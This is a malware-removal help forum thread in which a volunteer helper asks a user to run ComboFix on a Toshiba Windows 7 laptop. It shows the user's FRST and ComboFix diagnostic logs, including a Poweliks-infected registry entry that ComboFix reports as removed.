HomeGroupUser$ (S-1-5-21-616022151-183045692-1389677156-1009 - Limited - Enabled)
UpdatusUser (S-1-5-21-616022151-183045692-1389677156-1011 - Limited - Enabled) => C:\Users\UpdatusUser.Heathman-PC

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (10/28/2014 10:38:16 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 10:25:21 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 10:03:37 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (10/28/2014 10:03:37 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (10/28/2014 09:21:19 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 09:11:13 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (10/28/2014 09:11:13 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (10/28/2014 09:05:23 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 09:04:55 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/28/2014 09:00:00 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

System errors:
=============
Error: (10/28/2014 10:04:04 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/28/2014 09:21:40 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}

Error: (10/28/2014 09:21:34 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {078AEF33-C48A-49F7-AFF3-A0EE810BFE7C}

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14349) (User: )
Description: 0x800700b7

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14353) (User: )
Description: 00x800700b7http://+:10243/WMPNSSv4/2059632502/

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14349) (User: )
Description: 0x800700b7

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14353) (User: )
Description: 00x800700b7http://+:10243/WMPNSSv4/2059632502/

Error: (10/28/2014 09:04:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DgiVecp service failed to start due to the following error:
%%20

Error: (10/28/2014 08:58:46 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/28/2014 08:55:50 PM) (Source: WMPNetworkSvc) (EventID: 14349) (User: )
Description: 0x800700b7

Microsoft Office Sessions:
=========================
Error: (10/28/2014 10:38:16 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 10:25:21 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 10:03:37 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (10/28/2014 10:03:37 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

Error: (10/28/2014 09:21:19 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 09:11:13 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (10/28/2014 09:11:13 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

Error: (10/28/2014 09:05:23 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 09:04:55 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/28/2014 09:00:00 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

CodeIntegrity Errors:
===================================
  Date: 2014-06-15 16:45:26.328
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:42.065
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:41.124
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:41.064
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:40.733
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:40.674
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:40.554
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:40.494
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:40.402
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:40.338
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel® Core i5-2450M CPU @ 2.50GHz
Percentage of memory in use: 33%
Total physical RAM: 8098.69 MB
Available physical RAM: 5395.79 MB
Total Pagefile: 16195.55 MB
Available Pagefile: 12958.59 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: (TI106332W0C) (Fixed) (Total:449.23 GB) (Free:296.36 GB) NTFS ==>[system with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 469CBCD6)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=449.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=15.1 GB) - (Type=17)

==================== End Of Log ============================

 

Thank you.


My name's Naathim and I'm a GeekU Minion! Now that we are mates and will be working together to clean your machine out of any junkware, feel free to call me Naat :)

Before we start please note the following:

  • Analysis and research take some time, also sometimes real life gets in the way, please be patient.
  • Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
  • Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
  • Paste the logs in your posts, attachments make my work harder and more complicated.
  • Stay with me to the end, the absence of symptoms doesn't mean that your machine is fully operational.
  • Note that we may live in totally different time zones, which may cause some delays between answers.

I can't foresee everything, so if anything unexpected happens, please stop and inform me!

There are no silly questions. Never be afraid to ask if in doubt!

Let's start and enjoy the fight! :)

Rules and policies

We won't support any piracy.

That being said, if any evidence of an illegal OS, software, cracks/keygens or anything similar is revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!

The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result in closing your topic and withdrawing any assistance.


Scan with ComboFix

This is a very powerful tool that should be used only if advised by a Malware Analyst.

Do not run ComboFix on your own!

Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.

Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.

If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.

  • Right-click on the ComboFix icon and select Run as Administrator to start the tool.
  • Accept the disclaimer and agree if prompted to install Recovery Console.
  • Do not take any actions while ComboFix goes through your System - it may cause it to stall!
  • This scan may take some time!
  • When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).

Include that log in your next reply.

If you encounter any issues with your internet connection after running ComboFix, please visit this link.

If an error about an operation on a key marked for deletion appears after running the tool, please reboot your machine.

Don't forget to re-enable your previously switched-off protection software!


Here is the Combo fix file

ComboFix 14-10-29.01 - ADH 10/29/2014 7:12.1.4 - x64

Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.8099.3113 [GMT -5:00]

Running from: c:\users\ADH.Heathman-PC\Desktop\ComboFix.exe

AV: Norton 360 Premier Edition *Disabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}

FW: Norton 360 Premier Edition *Disabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}

SP: Norton 360 Premier Edition *Disabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}

SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

* Created a new restore point

.

.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))

.

.

c:\programdata\Microsoft\Windows\DRM\88EB.tmp

c:\programdata\Roaming

c:\users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\{09C41CEA-0C2F-42B1-B987-476BADCA5F4D}.xps

c:\users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\{6C741E0A-07BC-41BF-BF75-DC89E12273E1}.xps

c:\users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\{D512F409-6980-47F2-A546-34D92FD2ACBE}.xps

c:\windows\msdownld.tmp

.

.

CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.

You should verify if current CLSID data is correct:

.

HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}

(Default) REG_SZ Thumbnail Cache Class Factory for Out of Proc Server

AppID REG_SZ {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}

.

HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32

(Default) REG_SZ c:\windows\system32\thumbcache.dll

ThreadingModel REG_SZ Apartment

.

.

((((((((((((((((((((((((( Files Created from 2014-09-28 to 2014-10-29 )))))))))))))))))))))))))))))))

.

.

2014-10-29 12:24 . 2014-10-29 12:24 -------- d-----w- c:\users\UpdatusUser.Heathman-PC\AppData\Local\temp

2014-10-29 12:24 . 2014-10-29 12:24 -------- d-----w- c:\users\Default\AppData\Local\temp

2014-10-29 12:24 . 2014-10-29 12:24 -------- d-----w- c:\users\UpdatusUser\AppData\Local\temp

2014-10-29 12:24 . 2014-10-29 12:24 -------- d-----w- c:\users\Heathman\AppData\Local\temp

2014-10-29 12:24 . 2014-10-29 12:24 -------- d-----w- c:\users\Guest\AppData\Local\temp

2014-10-29 03:04 . 2014-10-29 03:55 -------- d-----w- C:\FRST

2014-10-24 23:49 . 2014-10-29 02:21 -------- d--h--w- c:\programdata\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}

2014-10-21 15:22 . 2014-10-21 15:22 -------- d-----w- c:\users\ADH.Heathman-PC\AppData\Local\Diagnostics

2014-10-20 17:22 . 2014-09-05 02:11 6584320 ----a-w- c:\windows\system32\mstscax.dll

2014-10-20 17:22 . 2014-09-05 01:52 5703168 ----a-w- c:\windows\SysWow64\mstscax.dll

2014-10-19 21:19 . 2014-10-19 21:19 -------- d-----w- c:\program files (x86)\Common Files\Symantec Shared

2014-10-19 21:00 . 2014-10-19 21:00 177752 ----a-w- c:\windows\system32\drivers\SYMEVENT64x86.SYS

2014-10-19 21:00 . 2014-10-19 21:00 -------- d-----w- c:\program files (x86)\Norton 360

2014-10-19 20:49 . 2014-09-25 02:08 371712 ----a-w- c:\windows\system32\qdvd.dll

2014-10-19 20:49 . 2014-09-25 01:40 519680 ----a-w- c:\windows\SysWow64\qdvd.dll

2014-10-19 20:45 . 2014-09-13 01:58 77312 ----a-w- c:\windows\system32\packager.dll

2014-10-04 13:18 . 2014-10-19 21:04 -------- d-----w- c:\windows\system32\drivers\N360x64\1506000.020

.

.

.

(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))

.

2014-10-29 11:15 . 2014-05-18 01:38 129752 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys

2014-10-19 21:44 . 2012-03-29 00:04 103265616 ----a-w- c:\windows\system32\MRT.exe

2014-10-01 16:11 . 2014-05-17 22:12 63704 ----a-w- c:\windows\system32\drivers\mwac.sys

2014-10-01 16:11 . 2014-05-17 22:12 93400 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys

2014-10-01 16:11 . 2013-07-29 22:47 25816 ----a-w- c:\windows\system32\drivers\mbam.sys

2014-09-24 01:24 . 2012-04-02 01:34 701104 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe

2014-09-24 01:24 . 2011-11-22 04:31 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl

2014-09-09 22:11 . 2014-09-23 17:27 2048 ----a-w- c:\windows\system32\tzres.dll

2014-09-09 21:47 . 2014-09-23 17:27 2048 ----a-w- c:\windows\SysWow64\tzres.dll

2014-08-28 23:29 . 2011-03-29 02:36 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll

2014-08-23 02:07 . 2014-08-27 17:37 404480 ----a-w- c:\windows\system32\gdi32.dll

2014-08-23 01:45 . 2014-08-27 17:37 311808 ----a-w- c:\windows\SysWow64\gdi32.dll

2014-08-01 11:53 . 2014-09-10 11:46 1031168 ----a-w- c:\windows\system32\TSWorkspace.dll

2014-08-01 11:35 . 2014-09-10 11:46 793600 ----a-w- c:\windows\SysWow64\TSWorkspace.dll

.

.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))

.

.

*Note* empty entries & legit default entries are not shown

REGEDIT4

.

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"swg"="c:\program files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2012-03-24 39408]

.

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]

"SVPWUTIL"="c:\program files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe" [2010-11-09 532480]

"HWSetup"="c:\program files\TOSHIBA\Utilities\HWSetup.exe" [2011-03-10 423936]

"KeNotify"="c:\program files (x86)\TOSHIBA\Utilities\KeNotify.exe" [2010-08-16 34160]

"ToshibaServiceStation"="c:\program files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" [2011-07-12 1298816]

"ToshibaAppPlace"="c:\program files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe" [2010-09-23 552960]

"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2014-08-21 959176]

"Samsung PanelMgr"="c:\windows\Samsung\PanelMgr\ssmmgr.exe" [2009-12-09 606208]

"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]

"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-08-01 152392]

.

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]

"ConsentPromptBehaviorAdmin"= 5 (0x5)

"ConsentPromptBehaviorUser"= 3 (0x3)

"EnableUIADesktopToggle"= 0 (0x0)

.

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]

"LoadAppInit_DLLs"=1 (0x1)

"AppInit_DLLs"=c:\windows\SysWOW64\nvinit.dll

.

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]

"mixer3"=wdmaud.drv

.

R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]

R3 BTCFilterService;USB Networking Driver Filter Service;c:\windows\system32\DRIVERS\motfilt.sys;c:\windows\SYSNATIVE\DRIVERS\motfilt.sys [x]

R3 GamesAppService;GamesAppService;c:\program files (x86)\WildTangent Games\App\GamesAppService.exe;c:\program files (x86)\WildTangent Games\App\GamesAppService.exe [x]

R3 intaud_WaveExtensible;Intel WiDi Audio Device;c:\windows\system32\drivers\intelaud.sys;c:\windows\SYSNATIVE\drivers\intelaud.sys [x]

R3 JMCR;JMCR;c:\windows\system32\DRIVERS\jmcr.sys;c:\windows\SYSNATIVE\DRIVERS\jmcr.sys [x]

R3 motccgp;Motorola USB Composite Device Driver;c:\windows\system32\DRIVERS\motccgp.sys;c:\windows\SYSNATIVE\DRIVERS\motccgp.sys [x]

R3 motccgpfl;MotCcgpFlService;c:\windows\system32\DRIVERS\motccgpfl.sys;c:\windows\SYSNATIVE\DRIVERS\motccgpfl.sys [x]

R3 Motousbnet;Motorola USB Networking Driver Service;c:\windows\system32\DRIVERS\Motousbnet.sys;c:\windows\SYSNATIVE\DRIVERS\Motousbnet.sys [x]

R3 motusbdevice;Motorola USB Dev Driver;c:\windows\system32\DRIVERS\motusbdevice.sys;c:\windows\SYSNATIVE\DRIVERS\motusbdevice.sys [x]

R3 MyWiFiDHCPDNS;Wireless PAN DHCP Server;c:\program files\Intel\WiFi\bin\PanDhcpDns.exe;c:\program files\Intel\WiFi\bin\PanDhcpDns.exe [x]

R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]

R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]

R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]

R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]

R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]

R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]

S0 nvpciflt;nvpciflt;c:\windows\system32\DRIVERS\nvpciflt.sys;c:\windows\SYSNATIVE\DRIVERS\nvpciflt.sys [x]

S0 SymDS;Symantec Data Store;c:\windows\system32\drivers\N360x64\1506000.020\SYMDS64.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\SYMDS64.SYS [x]

S0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\drivers\N360x64\1506000.020\SYMEFA64.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\SYMEFA64.SYS [x]

S0 Thpdrv;TOSHIBA HDD Protection Driver;c:\windows\system32\DRIVERS\thpdrv.sys;c:\windows\SYSNATIVE\DRIVERS\thpdrv.sys [x]

S0 Thpevm;TOSHIBA HDD Protection - Shock Sensor Driver;c:\windows\system32\DRIVERS\Thpevm.SYS;c:\windows\SYSNATIVE\DRIVERS\Thpevm.SYS [x]

S0 tos_sps64;TOSHIBA tos_sps64 Service;c:\windows\system32\DRIVERS\tos_sps64.sys;c:\windows\SYSNATIVE\DRIVERS\tos_sps64.sys [x]

S1 BHDrvx64;BHDrvx64;c:\program files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\BASHDefs\20141024.001\BHDrvx64.sys;c:\program files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\BASHDefs\20141024.001\BHDrvx64.sys [x]

S1 ccSet_N360;N360 Settings Manager;c:\windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\ccSetx64.sys [x]

S1 IDSVia64;IDSVia64;c:\program files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\IPSDefs\20141028.001\IDSvia64.sys;c:\program files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\IPSDefs\20141028.001\IDSvia64.sys [x]

S1 SymIRON;Symantec Iron Driver;c:\windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\Ironx64.SYS [x]

S1 SymNetS;Symantec Network Security WFP Driver;c:\windows\system32\drivers\N360x64\1506000.020\SYMNETS.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\SYMNETS.SYS [x]

S2 DeviceMonitorService;DeviceMonitorService;c:\program files (x86)\Motorola Media Link\Lite\NServiceEntry.exe;c:\program files (x86)\Motorola Media Link\Lite\NServiceEntry.exe [x]

S2 IntuitUpdateServiceV4;Intuit Update Service v4;c:\program files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe;c:\program files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe [x]

S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [x]

S2 Motorola Device Manager;Motorola Device Manager Service;c:\program files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe;c:\program files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [x]

S2 N360;Norton 360;c:\program files (x86)\Norton 360\Engine\21.6.0.32\N360.exe;c:\program files (x86)\Norton 360\Engine\21.6.0.32\N360.exe [x]

S2 Norton PC Checkup Application Launcher;Norton PC Checkup Application Launcher;c:\program files (x86)\PC Checkup\SymcPCCULaunchSvc.exe;c:\program files (x86)\PC Checkup\SymcPCCULaunchSvc.exe [x]

S2 PCCUJobMgr;Common Client Job Manager Service;c:\program files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe;c:\program files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe [x]

S2 PST Service;PST Service;c:\program files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe;c:\program files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [x]

S2 SSPORT;SSPORT;c:\windows\system32\Drivers\SSPORT.sys;c:\windows\SYSNATIVE\Drivers\SSPORT.sys [x]

S2 TomTomHOMEService;TomTomHOMEService;c:\program files (x86)\TomTom HOME 2\TomTomHOMEService.exe;c:\program files (x86)\TomTom HOME 2\TomTomHOMEService.exe [x]

S2 TOSHIBA eco Utility Service;TOSHIBA eco Utility Service;c:\program files\TOSHIBA\TECO\TecoService.exe;c:\program files\TOSHIBA\TECO\TecoService.exe [x]

S2 TVALZFL;TOSHIBA ACPI-Based Value Added Logical and General Purpose Device Filter Driver;c:\windows\system32\DRIVERS\TVALZFL.sys;c:\windows\SYSNATIVE\DRIVERS\TVALZFL.sys [x]

S2 UDSS;UDSS;c:\program files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe;c:\program files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe [x]

S2 UNS;Intel® Management and Security Application User Notification Service;c:\program files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [x]

S3 CeKbFilter;CeKbFilter;c:\windows\system32\DRIVERS\CeKbFilter.sys;c:\windows\SYSNATIVE\DRIVERS\CeKbFilter.sys [x]

S3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys;c:\program files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [x]

S3 IntcDAud;Intel® Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys;c:\windows\SYSNATIVE\DRIVERS\IntcDAud.sys [x]

S3 iwdbus;IWD Bus Enumerator;c:\windows\system32\DRIVERS\iwdbus.sys;c:\windows\SYSNATIVE\DRIVERS\iwdbus.sys [x]

S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]

S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys;c:\windows\SYSNATIVE\drivers\MBAMSwissArmy.sys [x]

S3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]

